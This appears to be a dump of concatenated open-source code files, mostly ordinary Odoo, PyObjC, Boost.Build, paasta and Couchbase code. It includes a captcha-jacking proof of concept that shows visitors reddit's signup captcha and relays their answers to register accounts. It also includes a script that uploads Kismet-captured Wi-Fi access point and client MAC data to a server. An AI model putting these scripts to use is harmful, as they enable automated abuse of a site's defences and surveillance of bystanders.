        def draw_buttons(self, context, layout):
            # Only the "Join" flag lives in the node UI; the numeric
            # parameters arrive through input sockets.
            layout.prop(self, 'join', toggle=True)

        def sv_init(self, context):
            # Create one input socket per property (bound via prop_name so
            # the socket shows the property when unconnected) and the
            # single curve output.
            self.inputs.new('SvStringsSocket', "Radius").prop_name = 'radius'
            self.inputs.new('SvStringsSocket', "Height").prop_name = 'height'
            self.inputs.new('SvStringsSocket', "Pitch").prop_name = 'pitch'
            self.inputs.new('SvStringsSocket', "Angle").prop_name = 'angle'
            self.outputs.new('SvCurveSocket', "Curve")

        def process(self):
            # Nothing downstream consumes the output: skip all work.
            if not any(socket.is_linked for socket in self.outputs):
                return

            radius_s = self.inputs['Radius'].sv_get()
            height_s = self.inputs['Height'].sv_get()
            pitch_s = self.inputs['Pitch'].sv_get()
            angle_s = self.inputs['Angle'].sv_get()

            curve_out = []
            # zip_long_repeat pairs up (possibly unequal-length) input
            # lists, repeating the last element of the shorter ones.
            for radiuses, heights, pitches, angles in zip_long_repeat(radius_s, height_s, pitch_s, angle_s):
                new_curves = []
                for radius, height, pitch, angle in zip_long_repeat(radiuses, heights, pitches, angles):
                    curve = make_helix(pitch, height, radius, angle)
                    new_curves.append(curve)
                if self.join:
                    # One flat list of curves across all parameter sets.
                    curve_out.extend(new_curves)
                else:
                    # One nested list of curves per parameter set.
                    curve_out.append(new_curves)

            self.outputs['Curve'].sv_set(curve_out)
def register():
    """Register the helix node class with Blender.

    A no-op when FreeCAD is unavailable, since the real node class is
    only defined in that case (a dummy node is registered elsewhere).
    """
    if FreeCAD is None:
        return
    bpy.utils.register_class(SvFreeCadHelixNode)
def unregister():
    """Unregister the helix node class from Blender.

    Mirrors :func:`register`: does nothing when FreeCAD is missing,
    because the class was never registered in that case.
    """
    if FreeCAD is None:
        return
    bpy.utils.unregister_class(SvFreeCadHelixNode)
| gpl-3.0 |
LatinuxSistemas/stock-logistics-warehouse | __unported__/stock_inventory_extended/__openerp__.py | 10 | 1688 | # -*- coding: utf-8 -*-
#################################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2011 Julius Network Solutions SARL <contact@julius.fr>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#################################################################################
{
"name" : "Move Inventory Extended",
"version" : "1.0",
"author" : "Julius Network Solutions,Odoo Community Association (OCA)",
"description" : """
Presentation:
This module adds a new field based on lines into the inventory
to get all lines pre-filled and all lines scanned
""",
"website" : "http://www.julius.fr",
"depends" : [
"stock",
],
"category" : "Customs/Stock",
"init_xml" : [],
"demo_xml" : [],
"images" : ['images/Inventory extended.png'],
"update_xml" : [
'stock_view.xml',
# 'wizard/stock_fill_inventory_view.xml',
],
'test': [],
'installable': False,
'active': False,
'certificate': '',
}
| agpl-3.0 |
albertz/music-player | mac/pyobjc-framework-Cocoa/PyObjCTest/test_nsxpcconnection.py | 3 | 1584 | from PyObjCTools.TestSupport import *
import Foundation
class XPCHelper (Foundation.NSObject):
    # Stub Objective-C methods: the empty implementations exist only so
    # PyObjC creates selectors whose bridged signatures the tests below
    # can introspect.
    def remoteObjectProxyWithErrorHandler_(self, a): pass
    def listener_shouldAcceptNewConnection_(self, a, b): pass
class TestNSXPCConnection (TestCase):
    """Checks PyObjC bridge metadata for the NSXPCConnection APIs (OS X 10.8+)."""

    @min_os_level('10.8')
    def testConstants10_8(self):
        self.assertEqual(Foundation.NSXPCConnectionPrivileged, 1<<12)

    @min_os_level('10.8')
    def testProtocol10_8(self):
        # Error-handler blocks take one object argument ('v@'); the
        # delegate callback must be bridged as returning BOOL.
        self.assertArgIsBlock(XPCHelper.remoteObjectProxyWithErrorHandler_, 0, b'v@')
        self.assertResultIsBOOL(XPCHelper.listener_shouldAcceptNewConnection_)

    @min_os_level('10.8')
    def testMethods10_8(self):
        # Block-typed arguments/results and BOOL bridging on the real
        # Foundation classes.
        self.assertArgIsBlock(Foundation.NSXPCConnection.remoteObjectProxyWithErrorHandler_, 0, b'v@')
        self.assertResultIsBlock(Foundation.NSXPCConnection.interruptionHandler, b'v')
        self.assertArgIsBlock(Foundation.NSXPCConnection.setInterruptionHandler_, 0, b'v')
        self.assertResultIsBlock(Foundation.NSXPCConnection.invalidationHandler, b'v')
        self.assertArgIsBlock(Foundation.NSXPCConnection.setInvalidationHandler_, 0, b'v')
        self.assertArgIsBOOL(Foundation.NSXPCInterface.setClasses_forSelector_argumentIndex_ofReply_, 3)
        self.assertArgIsBOOL(Foundation.NSXPCInterface.classesForSelector_argumentIndex_ofReply_, 2)
        self.assertArgIsBOOL(Foundation.NSXPCInterface.setInterface_forSelector_argumentIndex_ofReply_, 3)
        self.assertArgIsBOOL(Foundation.NSXPCInterface.interfaceForSelector_argumentIndex_ofReply_, 2)
if __name__ == "__main__":
main()
| bsd-2-clause |
akretion/odoo | addons/mrp/tests/test_stock.py | 10 | 9525 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from . import common
from odoo.exceptions import except_orm
class TestWarehouse(common.TestMrpCommon):
    """MRP/stock integration tests: manufacturing routes, scrapping of
    consumed material, and putaway strategies applied to finished goods."""

    def setUp(self):
        """Create a Stock -> Depot putaway strategy, a laptop BoM, and a
        ``self.new_mo_laptop`` factory used by the putaway tests below."""
        super(TestWarehouse, self).setUp()
        self.stock_location = self.env.ref('stock.stock_location_stock')
        self.depot_location = self.env['stock.location'].create({
            'name': 'Depot',
            'usage': 'internal',
            'location_id': self.stock_location.id,
        })
        # Every product category put away in Stock is redirected to Depot.
        putaway = self.env['product.putaway'].create({
            'name': 'putaway stock->depot',
            'fixed_location_ids': [(0, 0, {
                'category_id': self.env.ref('product.product_category_all').id,
                'fixed_location_id': self.depot_location.id,
            })]
        })
        self.stock_location.write({
            'putaway_strategy_id': putaway.id,
        })
        self.laptop = self.env.ref("product.product_product_25")
        graphics_card = self.env.ref("product.product_product_24")
        unit = self.env.ref("uom.product_uom_unit")
        mrp_routing = self.env.ref("mrp.mrp_routing_0")
        # One laptop consumes one graphics card, via the demo routing.
        bom_laptop = self.env['mrp.bom'].create({
            'product_tmpl_id': self.laptop.product_tmpl_id.id,
            'product_qty': 1,
            'product_uom_id': unit.id,
            'bom_line_ids': [(0, 0, {
                'product_id': graphics_card.id,
                'product_qty': 1,
                'product_uom_id': unit.id
            })],
            'routing_id': mrp_routing.id
        })

        # Return a new Manufacturing Order for laptop
        def new_mo_laptop():
            return self.env['mrp.production'].create({
                'product_id': self.laptop.id,
                'product_qty': 1,
                'product_uom_id': unit.id,
                'bom_id': bom_laptop.id
            })

        self.new_mo_laptop = new_mo_laptop

    def test_manufacturing_route(self):
        """Toggling ``manufacture_to_resupply`` on the warehouse must
        (de)activate the manufacture rule, route and operation type."""
        warehouse_1_stock_manager = self.warehouse_1.sudo(self.user_stock_manager)
        manu_rule = self.env['stock.rule'].search([
            ('action', '=', 'manufacture'),
            ('warehouse_id', '=', self.warehouse_1.id)])
        self.assertEqual(self.warehouse_1.manufacture_pull_id, manu_rule)
        manu_route = manu_rule.route_id
        self.assertIn(manu_route, warehouse_1_stock_manager._get_all_routes())
        # Disabling resupply-by-manufacture archives the rule and type.
        warehouse_1_stock_manager.write({
            'manufacture_to_resupply': False
        })
        self.assertFalse(self.warehouse_1.manufacture_pull_id.active)
        self.assertFalse(self.warehouse_1.manu_type_id.active)
        self.assertNotIn(manu_route, warehouse_1_stock_manager._get_all_routes())
        # Re-enabling brings everything back.
        warehouse_1_stock_manager.write({
            'manufacture_to_resupply': True
        })
        manu_rule = self.env['stock.rule'].search([
            ('action', '=', 'manufacture'),
            ('warehouse_id', '=', self.warehouse_1.id)])
        self.assertEqual(self.warehouse_1.manufacture_pull_id, manu_rule)
        self.assertTrue(self.warehouse_1.manu_type_id.active)
        self.assertIn(manu_route, warehouse_1_stock_manager._get_all_routes())

    def test_manufacturing_scrap(self):
        """
        Testing to do a scrap of consumed material.
        """
        # Update demo products
        (self.product_4 | self.product_2).write({
            'tracking': 'lot',
        })
        # Update Bill Of Material to remove product with phantom bom.
        self.bom_3.bom_line_ids.filtered(lambda x: x.product_id == self.product_5).unlink()
        # Create Inventory Adjustment For Stick and Stone Tools with lot.
        lot_product_4 = self.env['stock.production.lot'].create({
            'name': '0000000000001',
            'product_id': self.product_4.id,
        })
        lot_product_2 = self.env['stock.production.lot'].create({
            'name': '0000000000002',
            'product_id': self.product_2.id,
        })
        stock_inv_product_4 = self.env['stock.inventory'].create({
            'name': 'Stock Inventory for Stick',
            'filter': 'product',
            'product_id': self.product_4.id,
            'line_ids': [
                (0, 0, {'product_id': self.product_4.id, 'product_uom_id': self.product_4.uom_id.id, 'product_qty': 8, 'prod_lot_id': lot_product_4.id, 'location_id': self.ref('stock.stock_location_14')}),
            ]})
        stock_inv_product_2 = self.env['stock.inventory'].create({
            'name': 'Stock Inventory for Stone Tools',
            'filter': 'product',
            'product_id': self.product_2.id,
            'line_ids': [
                (0, 0, {'product_id': self.product_2.id, 'product_uom_id': self.product_2.uom_id.id, 'product_qty': 12, 'prod_lot_id': lot_product_2.id, 'location_id': self.ref('stock.stock_location_14')})
            ]})
        (stock_inv_product_4 | stock_inv_product_2).action_start()
        stock_inv_product_2.action_validate()
        stock_inv_product_4.action_validate()
        #Create Manufacturing order.
        production_3 = self.env['mrp.production'].create({
            'name': 'MO-Test003',
            'product_id': self.product_6.id,
            'product_qty': 12,
            'bom_id': self.bom_3.id,
            'product_uom_id': self.product_6.uom_id.id,
        })
        production_3.action_assign()
        # Check Manufacturing order's availability.
        self.assertEqual(production_3.availability, 'assigned', "Production order's availability should be Available.")
        # NOTE(review): the trailing comma makes ``location_id`` a 1-tuple,
        # and the ``cond and a or b`` idiom silently falls through when the
        # left value is falsy — confirm both are intended.
        location_id = production_3.move_raw_ids.filtered(lambda x: x.state not in ('done', 'cancel')) and production_3.location_src_id.id or production_3.location_dest_id.id,
        # Scrap Product Wood without lot to check assert raise ?.
        scrap_id = self.env['stock.scrap'].with_context(active_model='mrp.production', active_id=production_3.id).create({'product_id': self.product_2.id, 'scrap_qty': 1.0, 'product_uom_id': self.product_2.uom_id.id, 'location_id': location_id, 'production_id': production_3.id})
        with self.assertRaises(except_orm):
            scrap_id.do_scrap()
        # Scrap Product Wood with lot.
        self.env['stock.scrap'].with_context(active_model='mrp.production', active_id=production_3.id).create({'product_id': self.product_2.id, 'scrap_qty': 1.0, 'product_uom_id': self.product_2.uom_id.id, 'location_id': location_id, 'lot_id': lot_product_2.id, 'production_id': production_3.id})
        #Check scrap move is created for this production order.
        #TODO: should check with scrap objects link in between
        # scrap_move = production_3.move_raw_ids.filtered(lambda x: x.product_id == self.product_2 and x.scrapped)
        # self.assertTrue(scrap_move, "There are no any scrap move created for production order.")

    def test_putaway_after_manufacturing_1(self):
        """ This test checks a manufactured product without tracking will go to
        location defined in putaway strategy.
        """
        mo_laptop = self.new_mo_laptop()
        mo_laptop.button_plan()
        workorder = mo_laptop.workorder_ids[0]
        workorder.button_start()
        workorder.record_production()
        mo_laptop.button_mark_done()

        # We check if the laptop go in the depot and not in the stock
        move = mo_laptop.move_finished_ids
        location_dest = move.move_line_ids.location_dest_id
        self.assertEqual(location_dest.id, self.depot_location.id)
        self.assertNotEqual(location_dest.id, self.stock_location.id)

    def test_putaway_after_manufacturing_2(self):
        """ This test checks a tracked manufactured product will go to location
        defined in putaway strategy.
        """
        self.laptop.tracking = 'serial'
        mo_laptop = self.new_mo_laptop()
        mo_laptop.button_plan()
        workorder = mo_laptop.workorder_ids[0]
        workorder.button_start()
        # Production of a serial-tracked product needs a final lot.
        serial = self.env['stock.production.lot'].create({'product_id': self.laptop.id})
        workorder.final_lot_id = serial
        workorder.record_production()
        mo_laptop.button_mark_done()

        # We check if the laptop go in the depot and not in the stock
        move = mo_laptop.move_finished_ids
        location_dest = move.move_line_ids.location_dest_id
        self.assertEqual(location_dest.id, self.depot_location.id)
        self.assertNotEqual(location_dest.id, self.stock_location.id)

    def test_putaway_after_manufacturing_3(self):
        """ This test checks a tracked manufactured product will go to location
        defined in putaway strategy when the production is recorded with
        product.produce wizard.
        """
        self.laptop.tracking = 'serial'
        mo_laptop = self.new_mo_laptop()
        serial = self.env['stock.production.lot'].create({'product_id': self.laptop.id})
        # Record the production through the wizard instead of workorders.
        product_produce = self.env['mrp.product.produce'].with_context({
            'active_id': mo_laptop.id,
            'active_ids': [mo_laptop.id],
        }).create({
            'product_qty': 1.0,
            'lot_id': serial.id,
        })
        product_produce.do_produce()
        mo_laptop.button_mark_done()

        # We check if the laptop go in the depot and not in the stock
        move = mo_laptop.move_finished_ids
        location_dest = move.move_line_ids.location_dest_id
        self.assertEqual(location_dest.id, self.depot_location.id)
        self.assertNotEqual(location_dest.id, self.stock_location.id)
| agpl-3.0 |
infosec-au/CaptchaJackingPoC | failed_attempts/cjack_reddit_requests.py | 3 | 4739 | from random import choice
import cherrypy
import requests
import re
import os.path
import cookielib
import urllib
import logging
import mechanize
from bs4 import BeautifulSoup
import cStringIO
## Mechanize Approach!
cj = cookielib.LWPCookieJar()
br = mechanize.Browser()
br.set_cookiejar(cj)
br.set_handle_equiv(True)
br.set_handle_gzip(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
br.open("http://www.reddit.com/register")
for f in br.forms():
print f
html_reg = br.response().read()
source_fixed1 = html_reg
cap_iden1 = re.compile(r'value="[A-Za-z0-9]{32}')
captchai1 = cap_iden1.search(source_fixed1)
cident_raw1 = captchai1.group()
cident1 = captchai1.group()
cident1 = cident1.replace("value=\"", "")
captchaname1 = "captchas/" + cident1 + ".png"
captchaurl1 = "http://reddit.com/captcha/{0}.png".format(cident1)
## Requests Approach ! didn't work!!
url = 'http://www.reddit.com/register'
ualist= [line.rstrip() for line in open('useragents.txt')]
headers = {'User-Agent': '{0}'.format(choice(ualist)),
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Referer': 'http://www.reddit.com/register',}
#cherrypy handling below
rsess = requests.Session()
regpage = rsess.get(url, headers=headers)
source = regpage.text
source_fixed = source.encode('ascii','ignore')
cap_iden = re.compile(r'value="[A-Za-z0-9]{32}')
captchai = cap_iden.search(source_fixed)
cident_raw = captchai.group()
cident = captchai.group()
cident = cident.replace("value=\"", "")
captchaname = "captchas/" + cident + ".png"
captchaurl = "http://reddit.com/captcha/{0}.png".format(cident)
class reddit_cjack:
    """CherryPy application for the captcha-jacking proof of concept:
    serves reddit's captcha inside our own page, then replays the
    victim's answer into reddit's registration form."""

    def index(self):
        # Download the captcha image fetched by the mechanize session so
        # it can be embedded in the page returned below.
        with open(captchaname1, 'wb') as handle:
            request = rsess.get(captchaurl1, headers=headers, stream=True)
            for block in request.iter_content(1024):
                if not block:
                    break
                handle.write(block)
        return """<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge"/>
<meta charset="utf-8" />
<title>Reddit Captcha Hijacking PoC</title>
<link rel="stylesheet" href="css/master.css" type="text/css" />
</head>
<body id="index">
<div id="container">
<div id="header"><h1>Captchajacking PoC - blog post <a href="http://blog.shubh.am/">here.</a></h1></div>
<div id="main">
<form action="execute" method="post">
<table cellpadding="0" cellspacing="0" border="0">
<tr>
<td class="form-input-name">Username</td>
<td class="input"><input type="username" name="username" placeholder="crash override" autocomplete="off" required="required" /></td>
</tr>
<tr>
<td class="form-input-name">Password</td>
<td class="input"><input type="password" name="passw" placeholder="gibsonhacker101" autocomplete="off" required="required" /></td>
</tr>
<tr>
<td class="form-input-name">Captcha</td>
<td class="input">""" + """<img src=""" + captchaname1 + """></img>""" + """<textarea name="captcha" rows="5" cols="29" placeholder="Captcha Text"></textarea></td>
</tr>
<tr>
<td class="form-input-name"></td>
<td><input type="submit" value="Register" /></td>
</tr>
</table>
</form>
</div>
</div>
</body>
</html>"""
    index.exposed = True

    def execute(self, username, passw, captcha):
        # Fill the first form on reddit's registration page with the
        # visitor-supplied credentials and captcha answer, then submit it
        # through the shared mechanize browser session.
        br.select_form(nr=0)
        br.form[ 'user' ] = username
        br.form[ 'passwd' ] = passw
        br.form[ 'passwd2' ] = passw
        br.form[ 'captcha' ] = captcha
        br.submit()
        # Earlier requests-based submission attempt (did not work):
        # rposturl = "https://ssl.reddit.com/api/register/" + username
        # datapayload = {
        # 'op':'reg',
        # 'dest' : '%2F',
        # 'user' : username,
        # 'email' : '',
        # 'passwd' : passw,
        # 'passwd2' : passw,
        # 'iden' : cident_raw,
        # 'captcha' : captcha,
        # 'api_type' : 'json'
        # }
        # regpost = rsess.post(rposturl, data=datapayload, headers=headers)
        # return regpost.text
    execute.exposed= True
# Serve static assets from the directory containing this script and mount
# the PoC application at the web root, then start the CherryPy server.
PATH = os.path.abspath(os.path.dirname(__file__))
conf = {
    '/': {
        'tools.staticdir.on': True,
        'tools.staticdir.dir': PATH,
    },
}
cherrypy.tree.mount(reddit_cjack(), "/", config=conf)
cherrypy.engine.start()
cherrypy.engine.block()
cpascal/af-cpp | apdos/exts/boost_1_53_0/tools/build/v2/test/library_chain.py | 2 | 3602 | #!/usr/bin/python
# Copyright 2003, 2004, 2005, 2006 Vladimir Prus
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or http://www.boost.org/LICENSE_1_0.txt)
# Test that a chain of libraries works ok, no matter if we use static or shared
# linking.
import BoostBuild
import string
import os
# Scenario 1: main -> libb -> liba as Boost.Build targets, shared linking.
t = BoostBuild.Tester()

t.write("jamfile.jam", """
# Stage the binary, so that it will be relinked without hardcode-dll-paths. That
# will chech that we pass correct -rpath-link, even if not passing -rpath.
stage dist : main ;
exe main : main.cpp b ;
""")

t.write("main.cpp", """
void foo();
int main() { foo(); }
""")

t.write("jamroot.jam", """
""")

t.write("a/a.cpp", """
void
#if defined(_WIN32)
__declspec(dllexport)
#endif
gee() {}
void
#if defined(_WIN32)
__declspec(dllexport)
#endif
geek() {}
""")

t.write("a/jamfile.jam", """
lib a : a.cpp ;
""")

t.write("b/b.cpp", """
void geek();
void
#if defined(_WIN32)
__declspec(dllexport)
#endif
foo() { geek(); }
""")

t.write("b/jamfile.jam", """
lib b : b.cpp ../a//a ;
""")

t.run_build_system("-d2", stderr=None)
t.expect_addition("bin/$toolset/debug/main.exe")
t.rm(["bin", "a/bin", "b/bin"])

# Same chain, but fully static.
t.run_build_system("link=static")
t.expect_addition("bin/$toolset/debug/link-static/main.exe")
t.rm(["bin", "a/bin", "b/bin"])

# Check that <library> works for static linking.
t.write("b/jamfile.jam", """
lib b : b.cpp : <library>../a//a ;
""")
t.run_build_system("link=static")
t.expect_addition("bin/$toolset/debug/link-static/main.exe")
t.rm(["bin", "a/bin", "b/bin"])

# Mixed case: static libb against shared liba.
t.write("b/jamfile.jam", """
lib b : b.cpp ../a//a/<link>shared : <link>static ;
""")
t.run_build_system()
t.expect_addition("bin/$toolset/debug/main.exe")
t.rm(["bin", "a/bin", "b/bin"])

# Test that putting a library in sources of a searched library works.
t.write("jamfile.jam", """
exe main : main.cpp png ;
lib png : z : <name>png ;
lib z : : <name>zzz ;
""")
t.run_build_system("-a -d+2", status=None, stderr=None)
# Try to find the "zzz" string either in response file (for Windows compilers),
# or in the standard output.
rsp = t.adjust_names("bin/$toolset/debug/main.exe.rsp")[0]
if os.path.exists(rsp) and ( string.find(open(rsp).read(), "zzz") != -1 ):
    pass
elif string.find(t.stdout(), "zzz") != -1:
    pass
else:
    t.fail_test(1)

# Test main -> libb -> liba chain in the case where liba is a file and not a
# Boost.Build target.
t.rm(".")
t.write("jamroot.jam", "")
t.write("a/jamfile.jam", """
lib a : a.cpp ;
install dist : a ;
""")
t.write("a/a.cpp", """
#if defined(_WIN32)
__declspec(dllexport)
#endif
void a() {}
""")

t.run_build_system(subdir="a")
t.expect_addition("a/dist/a.dll")

if ( ( os.name == 'nt' ) or os.uname()[0].lower().startswith('cygwin') ) and \
   ( BoostBuild.get_toolset() != 'gcc' ):
    # This is windows import library -- we know the exact name.
    file = "a/dist/a.lib"
else:
    file = t.adjust_names(["a/dist/a.dll"])[0]

# Reference the built library by file path rather than as a target.
t.write("b/jamfile.jam", """
lib b : b.cpp ../%s ;
""" % file)
t.write("b/b.cpp", """
#if defined(_WIN32)
__declspec(dllimport)
#endif
void a();
#if defined(_WIN32)
__declspec(dllexport)
#endif
void b() { a(); }
""")
t.write("jamroot.jam", """
exe main : main.cpp b//b ;
""")
t.write("main.cpp", """
#if defined(_WIN32)
__declspec(dllimport)
#endif
void b();
int main() { b(); }
""")

t.run_build_system()
t.expect_addition("bin/$toolset/debug/main.exe")

t.cleanup()
| apache-2.0 |
gstarnberger/paasta | paasta_tools/am_i_mesos_leader.py | 1 | 1039 | #!/usr/bin/env python
# Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Usage: ./am_i_mesos_leader.py
Check if this host is the curret mesos-master leader.
This is done by simply calling mesos_tools.is_mesos_leader.
Exits 0 if this is the leader, and 1 if it isn't.
"""
from sys import exit
from paasta_tools.mesos_tools import is_mesos_leader
def main():
if is_mesos_leader():
print True
exit(0)
else:
print False
exit(1)
if __name__ == "__main__":
main()
| apache-2.0 |
xcellerator/wifi_harvester | upload.py | 1 | 1335 | #!/usr/bin/python2.7
# Part of the WiFi Harvester project.
# AUTHOR: Harvey Phillips
# Project Home: https://github.com/xcellerator/wifi_harvester
# Released under GPL v2
import csv
import sys
import requests
if ( len(sys.argv) != 2 ):
print ("Usage: " + str(sys.argv[0]) + " <kismet csv>")
exit
else:
file = str(sys.argv[1])
with open(file, 'rU') as f:
reader = csv.reader(f)
data = list(list(rec) for rec in csv.reader(f, delimiter=','))
f.close()
split = data.index(['Station MAC', ' First time seen', ' Last time seen', ' Power', ' # packets', ' BSSID', ' Probed ESSIDs'])
ap_content = []
cl_content = []
server = "192.168.1.235"
for x in range(2, split - 1):
ESSID = data[x][13]
BSSID = data[x][0]
enc_string = data[x][5]
if (enc_string == " OPN"): enc_type = 0
if (enc_string == " WEP"): enc_type = 1
if (enc_string == " WPA2"): enc_type = 2
if (enc_string == " WPA2 WPA"): enc_type = 2
ap_content.append( [ 0, ESSID, BSSID, enc_type ] )
for x in range(split + 1, int(len(data)) - 1):
BSSID = data[x][0]
cl_content.append( [1, "NULL", BSSID, "NULL" ] )
content = ap_content + cl_content
for entry in content:
url = "http://" + server + "/update.php?a=" + str(entry[0]) + "&b=" + entry[1] + "&c=" + entry[2] + "&d=" + str(entry[3])
r = requests.get(url)
print "Captures uploaded successfully.\n"
| gpl-2.0 |
couchbaselabs/couchbase-cli | collector.py | 1 | 10474 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import traceback
import copy
import listservers
import buckets
import info
import util_cli as util
import cb_bin_client
import stats_buffer
class StatsCollector:
    """Gathers node, bucket, memcached (ep-engine) and ns_server statistics
    from a Couchbase cluster into the shared ``stats_buffer`` module."""

    def __init__(self, log):
        # Logger shared by every collection step.
        self.log = log

    def seg(self, k, v):
        # Parse ('some_stat_x_y', 'v') into (('some_stat', x, y), v)
        ka = k.split('_')
        k = '_'.join(ka[0:-1])
        kstart, kend = [int(x) for x in ka[-1].split(',')]
        return ((k, kstart, kend), int(v))

    def retrieve_node_stats(self, nodeInfo, nodeStats):
        """Copy the interesting fields of one node's REST info dict
        (``nodeInfo``) into the flat ``nodeStats`` dict."""
        nodeStats['portDirect'] = nodeInfo['ports']['direct']
        nodeStats['portProxy'] = nodeInfo['ports']['proxy']
        nodeStats['clusterMembership'] = nodeInfo['clusterMembership']
        nodeStats['os'] = nodeInfo['os']
        nodeStats['uptime'] = nodeInfo['uptime']
        nodeStats['version'] = nodeInfo['version']

        #memory
        nodeStats['memory'] = {}
        nodeStats['memory']['allocated'] = nodeInfo['mcdMemoryAllocated']
        nodeStats['memory']['reserved'] = nodeInfo['mcdMemoryReserved']
        nodeStats['memory']['free'] = nodeInfo['memoryFree']
        nodeStats['memory']['quota'] = nodeInfo['memoryQuota']
        nodeStats['memory']['total'] = nodeInfo['memoryTotal']

        #storageInfo
        nodeStats['StorageInfo'] = {}
        if nodeInfo['storageTotals'] is not None:
            #print nodeInfo
            hdd = nodeInfo['storageTotals']['hdd']
            if hdd is not None:
                nodeStats['StorageInfo']['hdd'] = {}
                nodeStats['StorageInfo']['hdd']['free'] = hdd['free']
                nodeStats['StorageInfo']['hdd']['quotaTotal'] = hdd['quotaTotal']
                nodeStats['StorageInfo']['hdd']['total'] = hdd['total']
                nodeStats['StorageInfo']['hdd']['used'] = hdd['used']
                nodeStats['StorageInfo']['hdd']['usedByData'] = hdd['usedByData']
            ram = nodeInfo['storageTotals']['ram']
            if ram is not None:
                nodeStats['StorageInfo']['ram'] = {}
                nodeStats['StorageInfo']['ram']['quotaTotal'] = ram['quotaTotal']
                nodeStats['StorageInfo']['ram']['total'] = ram['total']
                nodeStats['StorageInfo']['ram']['used'] = ram['used']
                nodeStats['StorageInfo']['ram']['usedByData'] = ram['usedByData']
                # 'quotaUsed' is not always present in the REST payload.
                if ram.has_key('quotaUsed'):
                    nodeStats['StorageInfo']['ram']['quotaUsed'] = ram['quotaUsed']
                else:
                    nodeStats['StorageInfo']['ram']['quotaUsed'] = 0

        #system stats
        nodeStats['systemStats'] = {}
        nodeStats['systemStats']['cpu_utilization_rate'] = nodeInfo['systemStats']['cpu_utilization_rate']
        nodeStats['systemStats']['swap_total'] = nodeInfo['systemStats']['swap_total']
        nodeStats['systemStats']['swap_used'] = nodeInfo['systemStats']['swap_used']

        # Item counters default to 0 when 'interestingStats' is missing
        # or lacks the individual keys.
        curr_items = 0
        curr_items_tot = 0
        vb_rep_curr_items = 0
        if nodeInfo['interestingStats'] is not None:
            if nodeInfo['interestingStats'].has_key('curr_items'):
                curr_items = nodeInfo['interestingStats']['curr_items']
            else:
                curr_items = 0
            if nodeInfo['interestingStats'].has_key('curr_items_tot'):
                curr_items_tot = nodeInfo['interestingStats']['curr_items_tot']
            else:
                curr_items_tot = 0
            if nodeInfo['interestingStats'].has_key('vb_replica_curr_items'):
                vb_rep_curr_items = nodeInfo['interestingStats']['vb_replica_curr_items']
            else:
                vb_rep_curr_items = 0

        nodeStats['systemStats']['currentItems'] = curr_items
        nodeStats['systemStats']['currentItemsTotal'] = curr_items_tot
        nodeStats['systemStats']['replicaCurrentItems'] = vb_rep_curr_items

    def get_hostlist(self, server, port, user, password, opts):
        """Fetch the cluster's node list, store per-node stats in
        ``stats_buffer.nodes`` and return the raw node list.  Exits the
        process on any error."""
        try:
            opts.append(("-o", "return"))
            nodes = listservers.ListServers().runCmd('host-list', server, port, user, password, opts)
            for node in nodes:
                (node_server, node_port) = util.hostport(node['hostname'])
                node_stats = {"host" : node_server,
                              "port" : node_port,
                              "status" : node['status'],
                              "master" : server}
                stats_buffer.nodes[node['hostname']] = node_stats
                if node['status'] == 'healthy':
                    # Detailed info is only retrievable from healthy nodes.
                    node_info = info.Info().runCmd('get-server-info', node_server, node_port, user, password, opts)
                    self.retrieve_node_stats(node_info, node_stats)
                else:
                    self.log.error("Unhealthy node: %s:%s" %(node_server, node['status']))
            return nodes
        except Exception, err:
            traceback.print_exc()
            sys.exit(1)

    def get_bucketlist(self, server, port, user, password, opts):
        """Fetch all buckets, store their metadata in
        ``stats_buffer.bucket_info`` and their summary stats in
        ``stats_buffer.buckets_summary``; return the raw bucket list."""
        try:
            bucketlist = buckets.Buckets().runCmd('bucket-get', server, port, user, password, opts)
            for bucket in bucketlist:
                bucket_name = bucket['name']
                self.log.info("bucket: %s" % bucket_name)
                bucketinfo = {}
                bucketinfo['name'] = bucket_name
                bucketinfo['bucketType'] = bucket['bucketType']
                bucketinfo['authType'] = bucket['authType']
                bucketinfo['saslPassword'] = bucket['saslPassword']
                bucketinfo['numReplica'] = bucket['replicaNumber']
                bucketinfo['ramQuota'] = bucket['quota']['ram']
                bucketinfo['master'] = server

                bucketStats = bucket['basicStats']
                bucketinfo['bucketStats'] = {}
                bucketinfo['bucketStats']['diskUsed'] = bucketStats['diskUsed']
                bucketinfo['bucketStats']['memUsed'] = bucketStats['memUsed']
                bucketinfo['bucketStats']['diskFetches'] = bucketStats['diskFetches']
                bucketinfo['bucketStats']['quotaPercentUsed'] = bucketStats['quotaPercentUsed']
                bucketinfo['bucketStats']['opsPerSec'] = bucketStats['opsPerSec']
                bucketinfo['bucketStats']['itemCount'] = bucketStats['itemCount']

                stats_buffer.bucket_info[bucket_name] = bucketinfo

                # get bucket related stats
                c = buckets.BucketStats(bucket_name)
                json = c.runCmd('bucket-stats', server, port, user, password, opts)
                stats_buffer.buckets_summary[bucket_name] = json
            return bucketlist
        except Exception, err:
            traceback.print_exc()
            sys.exit(1)

    def get_mc_stats_per_node(self, mc, stats):
